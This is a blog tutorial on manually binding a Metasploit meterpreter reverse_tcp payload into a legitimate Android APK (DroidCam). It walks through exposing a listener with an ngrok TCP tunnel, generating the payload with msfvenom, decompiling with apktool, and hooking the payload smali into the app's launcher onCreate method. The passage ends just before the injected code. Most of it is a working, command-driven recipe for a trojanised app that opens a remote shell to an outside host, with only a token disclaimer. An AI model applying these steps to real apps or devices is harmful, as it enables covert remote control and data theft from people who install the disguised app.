How to bind metasploit payload with APK in 2021 | Dansh | manually

 How to bind payload with APK in 2021

This blog will be about manually embedding payload into Android APK

Why Android?

As you can see on the left Android is the most common smartphone operating system in the world and in India alone, approx. 90 percent of users use smartphones to have Android installed on their computers, whether their Lollipop or Nugget edition. Thus, because of Android’s success and instability problem, it has been the first option for cybercriminals to pawn. A huge number of Android users are not too familiar with android security, which is another aspect that cybercriminals are taking advantage of, and by social engineering, users are downloading backdoor applications that contribute to system compromising. We’re going to speak in this article about a common technique that cybercriminals use in backdoor APKs.

DISCLAIMER: This tutorial/software is intended for only educational purposes. It should not be used for illegal activity. The author will not responsible for the use thereof. Don’t be a jerk about it.

Getting Started

Assuming that you know :

• Having a basic knowledge of Linux.
• Running a Debian-based system (Ubuntu, Kali Linux),
• An Original APK, I used DroidCam.
• Apktool, Ngrok, Metasploit installed.

Fire up Ngrok!

What is ngrok: It basically exposes local servers behind NATs and firewalls to the public internet over secure tunnels.

Start by signup to ngrok and get the auth token. Download ngrok and unzip it with unzipping/path/to/ngrok.zip

unzip /path/to/ngrok.zip

 Once ngrok is unzipped you need to make ngrok executable using sudo chmod +x ngrok.

sudo chmod +x ngrok

Now we need to add our ngrok auth token, we can do this by using the command.

 ./ngrok authtoken <YOUR_AUTH_TOKEN>

 Once auth token has been accepted launch ngrok using the command below. You can change the port to whatever port u want to open.

./ngrok tcp 4411

 Switching on necessary services

Open a new command terminal and use commands below to start services.

service postgresql start

service apache2 start

 Metasploit Part

1. Generate android payload

Type below command to generate an android payload with ngrok.

msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk

 Now we have our malicious payload ready!

• Embedding Payload

Now its time to decompile our apk files. Open up a new terminal and use the commands below to decompile our apk files to a new location.

• Decompiling payload

apktool d -f payload.apk -o payload 

 

 

             Decompiling original

Command explanation: d option will tell apktool to decompile our apk file, -f is to replace previous decompiled apk’s code, -o is the output location we want our decompiled files to go to.

      

                         Payload.smali

Now, we need to copy the payload file to the original apk’s folder go to the directory. Payload file is Payload.smali which will be found at payload/smali/com/metasploit/stage location and from there copy the payload.smali file.

Now create few folder in original file folder. Original > smali > com > metasploit > stage.

Now create few folder in original file folder. Original > smali > com > metasploit > stage.

Now, copy payload.smali file and paste at this location.

Now, we need to find out what activity is running to run when the app is launched(Original app) the information is stored in the AndroidManifest.xml file.

Open the AndroidManifest.xml file with your favorite text editor. In the file, we are looking for a reference to the following code.

<action android:name="android.intent.action.MAIN"/>

<category android:name="android.intent.category.LAUNCHER"/>

 You will see Markup Languages, and both use the familiar tags and attributes. look for a <activity> tag which contains both of these lines you can use CTRL+F to search for the line of code.

We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam We know this because the XML contains an intent-filter with “android.intent.action.MAIN” within it.

Follow the location, smali>com>dev47apps>droidcam>DroidCam.smali

Open the file in your favorite text editor DroidCam.smali

                     Modify the Activity EntryPoint Smali File

Within the “Droidcam.smali” file, we are looking for the “onCreate()” method.

;→onCreate(Landroid/os/Bundle;)V

 

When you locate it, paste the following code in the line next to it this will start the payload alongside of the original apk code.